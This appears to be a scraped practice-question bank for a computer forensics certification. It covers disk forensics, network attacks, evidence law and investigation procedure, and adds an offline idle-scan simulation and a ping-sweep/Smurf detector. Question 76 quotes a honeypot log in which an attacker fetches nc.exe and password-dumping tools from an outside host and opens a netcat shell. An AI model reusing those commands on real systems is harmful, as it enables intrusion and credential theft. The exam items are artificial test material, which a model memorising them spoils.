  • Exam Name: Computer Hacking Forensic Investigator (v9)
  • Last Update: Dec 8, 2024
  • Questions and Answers: 589
312-49v9 Practice Exam Questions with Answers Computer Hacking Forensic Investigator (v9) Certification

Question # 6

Smith, a forensic examiner, was analyzing a hard disk image to find and acquire deleted sensitive files. He stumbled upon a $Recycle.Bin folder in the root directory of the disk. Identify the operating system in use.

A. Windows 98
B. Linux
C. Windows 8.1
D. Windows XP

Question # 7

Which of the following tools captures and allows you to interactively browse the traffic on a network?

A. Security Task Manager
B. Wireshark
C. ThumbsDisplay
D. RegScanner

Question # 8

Who is responsible for the following tasks?

A. Non-forensics staff
B. Lawyers
C. System administrators
D. Local managers or other non-forensic staff

Question # 9

Which of the following refers to the process of a witness being questioned by the attorney who called that witness to the stand?

A. Witness Authentication
B. Direct Examination
C. Expert Witness
D. Cross Questioning

Question # 10

Which code does the FAT file system use to mark the file as deleted?

A. ESH
B. 5EH
C. H5E
D. E5H

Question # 11

How many possible sequence number combinations are there in the TCP/IP protocol?

A. 1 billion
B. 320 billion
C. 4 billion
D. 32 million

Question # 12

To check for POP3 traffic using Ethereal, on which port should an investigator search?

A. 143
B. 25
C. 110
D. 125

Question # 13

What does the 63.78.199.4(161) denote in the following Cisco router log entry?

Mar 14 22:57:53.425 EST: %SEC-6-IPACCESSLOGP: list internet-inbound denied udp 66.56.16.77(1029) -> 63.78.199.4(161), 1 packet

A. Destination IP address
B. Source IP address
C. Login IP address
D. None of the above

Question # 14

What will the following Linux command accomplish?

dd if=/dev/mem of=/home/sam/mem.bin bs=1024

A. Copy the master boot record to a file
B. Copy the contents of the system folder to a file
C. Copy the running memory to a file
D. Copy the memory dump file to an image file

Question # 15

What type of equipment would a forensics investigator store in a StrongHold bag?

A. PDA
B. Backup tapes
C. Hard drives
D. Wireless cards

Question # 16

Which of the following acts as a network intrusion detection system as well as a network intrusion prevention system?

A. Acunetix
B. Nikto
C. Snort
D. Kismet

Question # 17

Harold is finishing up a report on a case of network intrusion, corporate spying, and embezzlement that he has been working on for over six months. He is trying to find the right term to use in his report to describe network-enabled spying. What term should Harold use?

A. Spycrack
B. Spynet
C. Netspionage
D. Hackspionage

Question # 18

The process of restarting a computer that is already turned on through the operating system is called?

A. Warm boot
B. Ice boot
C. Hot Boot
D. Cold boot

Question # 19

You have been given the task to investigate web attacks on a Windows-based server. Which of the following commands will you use to look at the sessions the machine has opened with other systems?

A. Net sessions
B. Net config
C. Net share
D. Net use

Question # 20

What type of attack sends spoofed UDP packets (instead of ping packets) with a fake source address to the IP broadcast address of a large network?

A. Fraggle
B. Smurf scan
C. SYN flood
D. Teardrop

Question # 21

The surface of a hard disk consists of several concentric rings known as tracks; each of these tracks has smaller partitions called disk blocks. What is the size of each block?

A. 512 bits
B. 512 bytes
C. 256 bits
D. 256 bytes

Question # 22

When searching through file headers for picture file formats, what should be searched to find a JPEG file in hexadecimal format?

A. FF D8 FF E0 00 10
B. FF FF FF FF FF FF
C. FF 00 FF 00 FF 00
D. EF 00 EF 00 EF 00

Question # 23

When making the preliminary investigations in a sexual harassment case, how many investigators is it recommended to have?

A. One
B. Two
C. Three
D. Four

Question # 24

What is the location of the binary files required for the functioning of the OS in a Linux system?

A. /run
B. /bin
C. /root
D. /sbin

Question # 25

Data is striped at a byte level across multiple drives, and parity information is distributed among all member drives.

[Exhibit image not included in this extract]

What RAID level is represented here?

A. RAID Level 0
B. RAID Level 5
C. RAID Level 3
D. RAID Level 1

Question # 26

Which of the following tools enables a user to reset his/her lost admin password on a Windows system?

A. Advanced Office Password Recovery
B. Active@ Password Changer
C. Smartkey Password Recovery Bundle Standard
D. Passware Kit Forensic

Question # 27

Where are files temporarily written in Unix when printing?

A. /usr/spool
B. /var/print
C. /spool
D. /var/spool

Question # 28

A forensics investigator is searching the hard drive of a computer for files that were recently moved to the Recycle Bin. He searches for files in C:\RECYCLED using a command line tool but does not find anything. What is the reason for this?

A. He should search in the C:\Windows\System32\RECYCLED folder
B. The Recycle Bin does not exist on the hard drive
C. The files are hidden and he must use a switch to view them
D. Only the FAT file system contains a RECYCLED folder, not NTFS

Question # 29

Jacob is a computer forensics investigator with over 10 years' experience in investigations and has written over 50 articles on computer forensics. He has been called upon as a qualified witness to testify to the accuracy and integrity of the technical log files gathered in an investigation into computer fraud. What is the term used for Jacob's testimony in this case?

A. Justification
B. Authentication
C. Reiteration
D. Certification

Question # 30

Davidson Trucking is a small transportation company that has three local offices in Detroit, Michigan. Ten female employees who work for the company have gone to an attorney reporting that male employees repeatedly harassed them and that management did nothing to stop the problem. Davidson has employee policies that outline all company guidelines, including awareness of harassment and how it will not be tolerated. When the case is brought to court, whom should the prosecuting attorney call upon for not upholding company policy?

A. IT personnel
B. Employees themselves
C. Supervisors
D. Administrative assistant in charge of writing policies

Question # 31

The investigator wants to examine changes made to the system's registry by the suspect program. Which of the following tools can help the investigator?

A. TRIPWIRE
B. RAM Capturer
C. Regshot
D. What's Running

Question # 32

In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?

A. Security Administrator
B. Network Administrator
C. Director of Information Technology
D. Director of Administration

Question # 33

What is the first step taken in an investigation for laboratory forensic staff members?

A. Packaging the electronic evidence
B. Securing and evaluating the electronic crime scene
C. Conducting preliminary interviews
D. Transporting the electronic evidence

Question # 34

Which of the following tasks DOES NOT come under the investigation phase of a cybercrime forensics investigation case?

A. Data collection
B. Secure the evidence
C. First response
D. Data analysis

Question # 35

What is considered a grant of a property right given to an individual who discovers or invents a new machine, process, useful composition of matter or manufacture?

A. Copyright
B. Design patent
C. Trademark
D. Utility patent

Question # 36

An expert witness is a __________________ who is normally appointed by a party to assist the formulation and preparation of a party's claim or defense.

A. Expert in criminal investigation
B. Subject matter specialist
C. Witness present at the crime scene
D. Expert law graduate appointed by attorney

Question # 37

Which tool does the investigator use to extract artifacts left by Google Drive on the system?

A. PEBrowse Professional
B. RegScanner
C. RAM Capturer
D. Dependency Walker

Question # 38

Heather, a computer forensics investigator, is assisting a group of investigators working on a large computer fraud case involving over 20 people. These 20 people, working in different offices, allegedly siphoned off money from many different client accounts. Heather's responsibility is to find out how the accused people communicated with each other. She has searched their email and their computers and has not found any useful evidence. Heather then finds some possibly useful evidence under the desk of one of the accused.

In an envelope she finds a piece of plastic with numerous holes cut out of it. Heather then finds the same exact piece of plastic with holes at many of the other accused people's desks. Heather believes that the 20 people involved in the case were using a cipher to send secret messages between each other. What type of cipher was used by the accused in this case?

A. Grille cipher
B. Null cipher
C. Text semagram
D. Visual semagram

Question # 39

While looking through the IIS log file of a web server, you find the following entries:

[Exhibit image not included in this extract]

What is evident from this log file?

A. Web bugs
B. Cross site scripting
C. Hidden fields
D. SQL injection is possible

Question # 40

Which of the following stages in a Linux boot process involves initialization of the system's hardware?

A. BIOS Stage
B. Bootloader Stage
C. BootROM Stage
D. Kernel Stage

Question # 41

Using Linux to carry out a forensics investigation, what would the following command accomplish?

dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror

A. Search for disk errors within an image file
B. Backup a disk to an image file
C. Copy a partition to an image file
D. Restore a disk from an image file

Question # 42

Which of the following reports is delivered under oath to a board of directors/managers/panel of the jury?

A. Written Formal Report
B. Verbal Formal Report
C. Verbal Informal Report
D. Written Informal Report

Question # 43

What feature of Windows is the following command trying to utilize?

[Exhibit image not included in this extract]

A. White space
B. AFS
C. ADS
D. Slack file

Question # 44

When operating systems mark a cluster as used but not allocated, the cluster is considered as _________

A. Corrupt
B. Bad
C. Lost
D. Unallocated

Question # 45

Depending upon the jurisdictional areas, different laws apply to different incidents. Which of the following laws is related to fraud and related activity in connection with computers?

A. 18 USC §1029
B. 18 USC §1030
C. 18 USC §1361
D. 18 USC §1371

Question # 46

John is working on his company policies and guidelines. The section he is currently working on covers company documents: how they should be handled, stored, and eventually destroyed. John is concerned about the process whereby outdated documents are destroyed. What type of shredder should John write in the guidelines to be used when destroying documents?

A. Strip-cut shredder
B. Cross-cut shredder
C. Cross-hatch shredder
D. Criss-cross shredder

Question # 47

Why would you need to find out the gateway of a device when investigating a wireless attack?

A. The gateway will be the IP of the proxy server used by the attacker to launch the attack
B. The gateway will be the IP of the attacker's computer
C. The gateway will be the IP used to manage the RADIUS server
D. The gateway will be the IP used to manage the access point

Question # 48

Which of the following standards represents a legal precedent set in 1993 by the Supreme Court of the United States regarding the admissibility of expert witnesses' testimony during federal legal proceedings?

A. IOCE
B. SWGDE & SWGIT
C. Frye
D. Daubert

Question # 49

In the following email header, where did the email first originate from?

[Exhibit image not included in this extract]

A. Somedomain.com
B. Smtp1.somedomain.com
C. Simon1.state.ok.gov.us
D. David1.state.ok.gov.us

Question # 50

Paul is a computer forensics investigator working for Tyler & Company Consultants. Paul has been called upon to help investigate a computer hacking ring broken up by the local police. Paul begins to inventory the PCs found in the hackers' hideout. Paul then comes across a PDA left by them that is attached to a number of different peripheral devices. What is the first step that Paul must take with the PDA to ensure the integrity of the investigation?

A. Place PDA, including all devices, in an antistatic bag
B. Unplug all connected devices
C. Power off all devices if currently on
D. Photograph and document the peripheral devices

Question # 51

Which of the following files DOES NOT use Object Linking and Embedding (OLE) technology to embed and link to other objects?

A. Portable Document Format
B. MS-office Word Document
C. MS-office Word OneNote
D. MS-office Word PowerPoint

Question # 52

A small law firm located in the Midwest has possibly been breached by a computer hacker looking to obtain information on their clientele. The law firm does not have any on-site IT employees, but wants to search for evidence of the breach themselves to prevent any possible media attention. Why would this not be recommended?

A. Searching for evidence themselves would not have any ill effects
B. Searching could possibly crash the machine or device
C. Searching creates cache files, which would hinder the investigation
D. Searching can change date/time stamps

Question # 53

Smith, as part of his forensic investigation assignment, seized a mobile device. He was asked to recover the Subscriber Identity Module (SIM card) data in the mobile device. Smith found that the SIM was protected by a Personal Identification Number (PIN) code, but he was also aware that people generally leave the PIN numbers at the defaults or use easily guessable numbers such as 1234. He made three unsuccessful attempts, which blocked the SIM card. What can Smith do in this scenario to reset the PIN and access SIM data?

A. He should contact the network operator for a Temporary Unlock Code (TUK)
B. Use system and hardware tools to gain access
C. He can attempt PIN guesses after 24 hours
D. He should contact the network operator for a Personal Unlock Number (PUK)

Question # 54

Using Internet logging software to investigate a case of malicious use of computers, the investigator comes across some entries that appear odd.

[Exhibit image not included in this extract]

From the log, the investigator can see where the person in question went on the Internet. From the log, it appears that the user was manually typing in different user ID numbers. What technique was this user trying?

A. Parameter tampering
B. Cross site scripting
C. SQL injection
D. Cookie Poisoning

Question # 55

How often must a company keep log files for them to be admissible in a court of law?

A. All log files are admissible in court no matter their frequency
B. Weekly
C. Monthly
D. Continuously

Question # 56

On an Active Directory network using NTLM authentication, where on the domain controllers are the passwords stored?

A. SAM
B. AMS
C. Shadow file
D. Password.conf

Question # 57

When using an iPod and the host computer is running Windows, what file system will be used?

A. iPod+
B. HFS
C. FAT16
D. FAT32

Question # 58

Which password cracking technique uses every possible combination of character sets?

A. Rainbow table attack
B. Brute force attack
C. Rule-based attack
D. Dictionary attack

Question # 59

An on-site incident response team is called to investigate an alleged case of computer tampering within their company. Before proceeding with the investigation, the CEO informs them that the incident will be classified as low level. How long will the team have to respond to the incident?

A. One working day
B. Two working days
C. Immediately
D. Four hours

Question # 60

Which US law does the interstate or international transportation and receiving of child pornography fall under?

A. §18. U.S.C. 1466A
B. §18. U.S.C 252
C. §18. U.S.C 146A
D. §18. U.S.C 2252

Question # 61

Which among the following is an act passed by the U.S. Congress in 2002 to protect investors from the possibility of fraudulent accounting activities by corporations?

A. HIPAA
B. GLBA
C. SOX
D. FISMA

Question # 62

The offset in a hexadecimal code is:

A. The last byte after the colon
B. The 0x at the beginning of the code
C. The 0x at the end of the code
D. The first byte after the colon

Question # 63

The police believe that Melvin Matthew has been obtaining unauthorized access to computers belonging to numerous computer software and computer operating systems manufacturers, cellular telephone manufacturers, Internet Service Providers and Educational Institutions. They also suspect that he has been stealing, copying and misappropriating proprietary computer software belonging to the several victim companies. What is preventing the police from breaking down the suspect's door and searching his home and seizing all of his computer equipment if they have not yet obtained a warrant?

A. The Fourth Amendment
B. The USA PATRIOT Act
C. The Good Samaritan Laws
D. The Federal Rules of Evidence

Question # 64

The use of warning banners helps a company avoid litigation by overcoming an employee's assumed __________________________ when connecting to the company's intranet, network or Virtual Private Network (VPN), and will allow the company's investigators to monitor, search and retrieve information stored within the network.

A. Right to work
B. Right of free speech
C. Right to Internet Access
D. Right of Privacy

Question # 65

The rule of thumb when shutting down a system is to pull the power plug. However, it has certain drawbacks. Which of the following would that be?

A. Any data not yet flushed to the system will be lost
B. All running processes will be lost
C. The /tmp directory will be flushed
D. Power interruption will corrupt the pagefile

Question # 66

Diskcopy is:

A. a utility by AccessData
B. a standard MS-DOS command
C. Digital Intelligence utility
D. dd copying tool

Question # 67

You are running known exploits against your network to test for possible vulnerabilities. To test the strength of your virus software, you load a test network to mimic your production network. Your software successfully blocks some simple macro and encrypted viruses. You decide to really test the software by using virus code where the code rewrites itself entirely and the signatures change from child to child, but the functionality stays the same. What type of virus is this that you are testing?

A. Polymorphic
B. Metamorphic
C. Oligomorphic
D. Transmorphic

Question # 68

The effort to obtain information before a trial by demanding documents, depositions, questions and answers written under oath, written requests for admissions of fact and examination of the scene is a description of what legal term?

A. Detection
B. Hearsay
C. Spoliation
D. Discovery

Question # 69

You are assisting in the investigation of a possible Web Server Hack. The company who called you stated that customers reported to them that whenever they entered the web address of the company in their browser, what they received was a pornographic web site. The company checked the web server and nothing appears wrong. When you type in the IP address of the web site in your browser everything appears normal. What is the name of the attack that affects the DNS cache of the name resolution servers, resulting in those servers directing users to the wrong web site?

A. ARP Poisoning
B. DNS Poisoning
C. HTTP redirect attack
D. IP Spoofing

Question # 70

In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze?

A. one who has NTFS 4 or 5 partitions
B. one who uses dynamic swap file capability
C. one who uses hard disk writes on IRQ 13 and 21
D. one who has lots of allocation units per block or cluster

Question # 71

The MD5 program is used to:

A. wipe magnetic media before recycling it
B. make directories on an evidence disk
C. view graphics files on an evidence drive
D. verify that a disk is not altered when you examine it

Question # 72

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer investigators should you request to staff the lab?

A. 8
B. 1
C. 4
D. 2

Question # 73

You have been asked to investigate after a user has reported a threatening e-mail they have received from an external source. Which of the following are you most interested in when trying to trace the source of the message?

A. The X509 Address
B. The SMTP reply Address
C. The E-mail Header
D. The Host Domain Name

Question # 74

Which response organization tracks hoaxes as well as viruses?

A. NIPC
B. FEDCIRC
C. CERT
D. CIAC

Question # 75

Office Documents (Word, Excel and PowerPoint) contain a code that allows tracking the MAC or unique identifier of the machine that created the document. What is that code called?

A. Globally unique ID
B. Microsoft Virtual Machine Identifier
C. Personal Application Protocol
D. Individual ASCII string

Question # 76

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

A. It is a local exploit where the attacker logs in using username johna2k
B. There are two attackers on the system - johna2k and haxedj00
C. The attack is a remote exploit and the hacker downloads three files
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Question # 77

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?

A. The system files have been copied by a remote attacker
B. The system administrator has created an incremental backup
C. The system has been compromised using a t0rnrootkit
D. Nothing in particular as these can be operational files

Question # 78

You are working as an independent computer forensics investigator and received a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the computer lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a "simple backup copy" of the hard drive in the PC and put it on this drive, and requests that you examine that drive for evidence of the suspected images. You inform him that a "simple backup copy" will not provide deleted files or recover file fragments.

What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceedings?

A. Bit-stream Copy
B. Robust Copy
C. Full backup Copy
D. Incremental Backup Copy

Question # 79

____________________ is simply the application of Computer Investigation and analysis techniques in the interests of determining potential legal evidence.

A. Network Forensics
B. Computer Forensics
C. Incident Response
D. Event Reaction

Question # 80

When cataloging digital evidence, the primary goal is to

A. Make bit-stream images of all hard drives
B. Preserve evidence integrity
C. Not remove the evidence from the scene
D. Not allow the computer to be turned off

Question # 81

When conducting computer forensic analysis, you must guard against ______________ so that you remain focused on the primary job and ensure that the level of work does not increase beyond what was originally expected.

A. Hard Drive Failure
B. Scope Creep
C. Unauthorized expenses
D. Overzealous marketing

Question # 82

Bob has been trying to penetrate a remote production system for the past two weeks. This time, however, he is able to get into the system. He was able to use the system for a period of three weeks. However, law enforcement agencies were recording his every activity and this was later presented as evidence.

The organization had used a Virtual Environment to trap Bob. What is a Virtual Environment?

A. A Honeypot that traps hackers
B. A system Using Trojaned commands
C. An environment set up after the user logs in
D. An environment set up before a user logs in

Question # 83

Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate. He knows he needs to allow FTP traffic to one of the servers on his network, but he wants to only allow FTP-PUT. Which firewall would be most appropriate for Harold's needs?

A. Circuit-level proxy firewall
B. Packet filtering firewall
C. Application-level proxy firewall
D. Data link layer firewall

Question # 84

Bill is the accounting manager for Grummon and Sons LLC in Chicago. On a regular basis, he needs to send PDF documents containing sensitive information through E-mail to his customers.

Bill protects the PDF documents with a password and sends them to their intended recipients.

Why do PDF passwords not offer maximum protection?

A. PDF passwords can easily be cracked by software brute force tools
B. PDF passwords are converted to clear text when sent through E-mail
C. PDF passwords are not considered safe by Sarbanes-Oxley
D. When sent through E-mail, PDF passwords are stripped from the document completely

Question # 85

You are running through a series of tests on your network to check for any security vulnerabilities.

After normal working hours, you initiate a DoS attack against your external firewall. The firewall quickly freezes up and becomes unusable. You then initiate an FTP connection from an external IP into your internal network. The connection is successful even though you have FTP blocked at the external firewall. What has happened?

A. The firewall failed-bypass
B. The firewall failed-closed
C. The firewall ACL has been purged
D. The firewall failed-open

Question # 86

What does ICMP Type 3/Code 13 mean?

A. Host Unreachable
B. Administratively Blocked
C. Port Unreachable
D. Protocol Unreachable

Question # 87

At what layer of the OSI model do routers function?

A. 4
B. 3
C. 1
D. 5

Question # 88

Sectors in hard disks typically contain how many bytes?

A. 256
B. 512
C. 1024
D. 2048

Question # 89

Volatile memory is one of the leading problems for forensics. Worms such as Code Red are memory resident and do not write themselves to the hard drive; if you turn the system off they disappear. In a lab environment, which of the following options would you suggest as the most appropriate to overcome the problem of capturing volatile memory?

A. Use VMware to be able to capture the data in memory and examine it
B. Give the Operating System a minimal amount of memory, forcing it to use a swap file
C. Create a separate partition of several hundred megabytes and place the swap file there
D. Use intrusion forensic techniques to study memory resident infections

Question # 90

George is the network administrator of a large Internet company on the west coast. Per corporate policy, none of the employees in the company are allowed to use FTP or SFTP programs without obtaining approval from the IT department. A few managers are using an SFTP program on their computers. Before talking to his boss, George wants to have some proof of their activity. George wants to use Ethereal to monitor network traffic, but only SFTP traffic to and from his network.

What filter should George use in Ethereal?

A. src port 23 and dst port 23
B. udp port 22 and host 172.16.28.1/24
C. net port 22
D. src port 22 and dst port 22

Question # 91

An expert witness gives an opinion if:

A. The opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors
B. To define the issues of the case for determination by the finder of fact
C. To stimulate discussion between the consulting expert and the expert witness
D. To deter the witness from expanding the scope of his or her investigation beyond the requirements of the case

Question # 92

In the context of the file deletion process, which of the following statements holds true?

A. When files are deleted, the data is overwritten and the cluster marked as available
B. The longer a disk is in use, the less likely it is that deleted files will be overwritten
C. While booting, the machine may create temporary files that can delete evidence
D. Secure delete programs work by completely overwriting the file in one go

Question # 93

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

A.

Linux/Unix computers are easier to compromise

B.

Linux/Unix computers are constantly talking

C.

Windows computers are constantly talking

D.

Windows computers will not respond to idle scans

Full Access
Question # 94

Jim performed a vulnerability analysis on his network and found no potential problems. He runs another utility that executes exploits against his system to verify the results of the vulnerability test.

The second utility executes five known exploits against his network that the vulnerability analysis said were not exploitable. What kind of results did Jim receive from his vulnerability analysis?

A.

False negatives

B.

False positives

C.

True negatives

D.

True positives

Full Access
Question # 95

Windows identifies which application to open a file with by examining which of the following?

A.

The File extension

B.

The file attributes

C.

The file Signature at the end of the file

D.

The file signature at the beginning of the file

Full Access
Question # 96

What type of file is represented by a colon (:) followed by a name in the Master File Table of an NTFS disk?

A.

A compressed file

B.

A Data stream file

C.

An encrypted file

D.

A reserved file

Full Access
Question # 97

John and Hillary work in the same department of the company. John wants to find out Hillary's network password so he can take a look at her documents on the file server. He puts the L0phtCrack program into sniffing mode. John sends Hillary an email with a link. What information will he be able to gather from this?

A.

Hillary's network username and password hash

B.

The SID of Hillary's network account

C.

The SAM file from Hillary's computer

D.

The network shares that Hillary has permissions to

Full Access
Question # 98

If an attacker's computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?

A.

The zombie will not send a response

B.

31402

C.

31399

D.

31401

Full Access
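The IPID arithmetic behind the idle scan question above, as an added simulation (not code from the question bank): a zombie whose IP ID counter increments globally by one for every packet it sends, an attacker who probes it before and after sending one spoofed SYN to the target, and the resulting delta of two for an open port versus one for a closed or filtered port. The zombie's starting IP ID (31399, so the first probe returns 31400), the hosts and the ports are constructed for the example; nothing is transmitted.

```python
"""Simulation of the IPID-based idle (zombie) scan.

Added illustration, not code from the question bank. Models the behaviour
the scan depends on: a zombie host whose IP ID field increments globally
by one for every packet it emits. Hosts, ports and the starting IP ID are
constructed; nothing is sent on the wire.
"""
from __future__ import annotations
from dataclasses import dataclass, field


@dataclass
class Zombie:
    """Idle host with a predictable, globally incrementing IP ID counter."""
    ipid: int

    def emit(self) -> int:
        """Send one packet; return the IP ID it carried (16-bit wraparound)."""
        self.ipid = (self.ipid + 1) & 0xFFFF
        return self.ipid

    def probe(self) -> int:
        """Attacker sends an unsolicited SYN/ACK; the zombie replies RST, leaking its IP ID."""
        return self.emit()

    def on_syn_ack_from_target(self) -> None:
        """A SYN/ACK the zombie never asked for: it answers with RST (one more packet)."""
        self.emit()

    def on_rst_from_target(self) -> None:
        """A bare RST is silently ignored: no packet, no IP ID increment."""
        return None


@dataclass
class Target:
    open_ports: set[int] = field(default_factory=set)
    filtered_ports: set[int] = field(default_factory=set)

    def receive_spoofed_syn(self, port: int, apparent_source: Zombie) -> None:
        """The target answers the spoofed SYN to the zombie, not to the attacker."""
        if port in self.filtered_ports:
            return                                    # dropped by a firewall: no reply
        if port in self.open_ports:
            apparent_source.on_syn_ack_from_target()  # SYN/ACK -> zombie sends RST
        else:
            apparent_source.on_rst_from_target()      # RST -> zombie stays quiet


def idle_scan(zombie: Zombie, target: Target, port: int, noise_packets: int = 0) -> dict:
    """One idle-scan round. noise_packets models other traffic the zombie sends meanwhile."""
    first = zombie.probe()
    target.receive_spoofed_syn(port, zombie)
    for _ in range(noise_packets):
        zombie.emit()                                 # a busy zombie corrupts the inference
    second = zombie.probe()
    delta = (second - first) & 0xFFFF
    if delta == 2:
        state = "open"
    elif delta == 1:
        state = "closed|filtered"
    else:
        state = "unreliable (zombie not idle)"
    return {"first_ipid": first, "second_ipid": second, "delta": delta, "state": state}


if __name__ == "__main__":
    print(idle_scan(Zombie(31399), Target(open_ports={22}), 22))   # open: 31400 -> 31402
    print(idle_scan(Zombie(31399), Target(open_ports={22}), 80))   # closed: 31400 -> 31401
```

The `noise_packets` parameter is the practical caveat: the inference only holds while the zombie is genuinely idle, which is why scanners verify the zombie's IP ID behaviour before trusting any result.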
Question # 99

In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider (ISP). You contact the ISP and request that they assist you with your investigation. What assistance can the ISP provide?

A.

The ISP can investigate anyone using their service and can provide you with assistance

B.

The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you without a warrant

C.

The ISP can't conduct any type of investigations on anyone and therefore can't assist you

D.

ISPs never maintain log files, so they would be of no use to your investigation

Full Access
Question # 100

The ____________________ refers to handing over the results of private investigations to the authorities because of indications of criminal activity.

A.

Locard Exchange Principle

B.

Clark Standard

C.

Kelly Policy

D.

Silver-Platter Doctrine

Full Access
Question # 101

You are a computer forensics investigator working with a local police department and you are called to assist in an investigation of threatening emails. The complainant has printed out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer because you need access to the _________________________ in order to track the emails back to the suspect.

A.

Routing Table

B.

Firewall log

C.

Configuration files

D.

Email Header

Full Access
Question # 102

Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?

A.

Tracert

B.

Smurf scan

C.

Ping trace

D.

ICMP ping sweep

Full Access
Question # 103

You work as a penetration tester for Hammond Security Consultants. You are currently working on a contract for the state government of California. Your next step is to initiate a DoS attack on their network. Why would you want to initiate a DoS attack on a system you are testing?

A.

Show outdated equipment so it can be replaced

B.

List weak points on their network

C.

Use attack as a launching point to penetrate deeper into the network

D.

Demonstrate that no system can be protected against DoS attacks

Full Access
Question # 104

James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network?

A.

Smurf

B.

Trinoo

C.

Fraggle

D.

SYN flood

Full Access
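The ICMP ping sweep (Question 102) and the Smurf and Fraggle tests (Question 104) are easy to tell apart in a capture once you know what to key on. The detector below is an added example, not code from the question bank: it classifies constructed packet records as a sweep (one source sending echo requests to many distinct hosts), a Smurf attempt (echo request to the network's broadcast address, the source being the spoofed victim) or a Fraggle attempt (UDP to the echo or chargen port of the broadcast address). The local network 192.168.1.0/24, the addresses and the sweep threshold are assumptions.

```python
"""Classify ICMP/UDP activity in a packet list as a ping sweep, a Smurf
attempt or a Fraggle attempt.

Added illustration, not from the question bank. Packet records are
constructed; the local network and the sweep threshold are assumptions.
"""
from __future__ import annotations
import ipaddress
from collections import Counter, defaultdict
from dataclasses import dataclass

ICMP_ECHO_REQUEST = 8
FRAGGLE_PORTS = {7, 19}          # UDP echo and chargen


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str               # "icmp" or "udp"
    icmp_type: int = -1      # only meaningful for proto == "icmp"
    dport: int = -1          # only meaningful for proto == "udp"


def classify(packets: list[Packet], local_net: str, sweep_threshold: int = 8) -> dict[tuple, int]:
    """Return {(kind, source, detail): count} for each finding in the capture."""
    net = ipaddress.ip_network(local_net)
    broadcasts = {str(net.broadcast_address), "255.255.255.255"}
    findings: Counter = Counter()
    echo_targets: dict[str, set[str]] = defaultdict(set)

    for p in packets:
        if p.proto == "icmp" and p.icmp_type == ICMP_ECHO_REQUEST:
            if p.dst in broadcasts:
                # echo request to the broadcast address: every host answers the
                # (spoofed) source, which is the Smurf amplification
                findings[("smurf", p.src, p.dst)] += 1
            else:
                echo_targets[p.src].add(p.dst)
        elif p.proto == "udp" and p.dport in FRAGGLE_PORTS and p.dst in broadcasts:
            findings[("fraggle", p.src, f"{p.dst}:{p.dport}")] += 1

    # a sweep is one source probing many distinct hosts, counted by host not packet
    for src, hosts in echo_targets.items():
        if len(hosts) >= sweep_threshold:
            findings[("ping-sweep", src, "distinct hosts")] = len(hosts)
    return dict(findings)


def sample_capture() -> list[Packet]:
    """Constructed traffic: a sweep, a Smurf burst with a spoofed source, one Fraggle probe."""
    sweep = [Packet("192.168.1.10", f"192.168.1.{i}", "icmp", ICMP_ECHO_REQUEST)
             for i in range(1, 13)]
    smurf = [Packet("10.0.0.5", "192.168.1.255", "icmp", ICMP_ECHO_REQUEST)] * 5
    fraggle = [Packet("10.0.0.5", "192.168.1.255", "udp", dport=7)]
    ordinary = [Packet("192.168.1.20", "192.168.1.1", "icmp", ICMP_ECHO_REQUEST)]
    return sweep + smurf + fraggle + ordinary


if __name__ == "__main__":
    for finding, count in classify(sample_capture(), "192.168.1.0/24").items():
        print(finding, count)
```

Note that the Smurf source address (10.0.0.5 here) is the victim, not the attacker: with a broadcast destination the interesting field is the destination, and the source only tells you who will receive the amplified replies.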
Question # 105

Which of the following should a computer forensics lab used for investigations have?

A.

isolation

B.

restricted access

C.

open access

D.

an entry log

Full Access
Question # 106

What is a good security method to prevent unauthorized users from "tailgating"?

A.

Man trap

B.

Electronic combination locks

C.

Pick-resistant locks

D.

Electronic key systems

Full Access
Question # 107

When investigating a potential e-mail crime, what is your first step in the investigation?

A.

Trace the IP address to its origin

B.

Write a report

C.

Determine whether a crime was actually committed

D.

Recover the evidence

Full Access
Question # 108

You have used a newly released forensic investigation tool, which doesn't meet the Daubert test, during a case. The case has ended up in court. What argument could the defense make to weaken your case?

A.

The tool hasn't been tested by the International Standards Organization (ISO)

B.

Only the local law enforcement should use the tool

C.

The tool has not been reviewed and accepted by your peers

D.

You are not certified for using the tool

Full Access
Question # 109

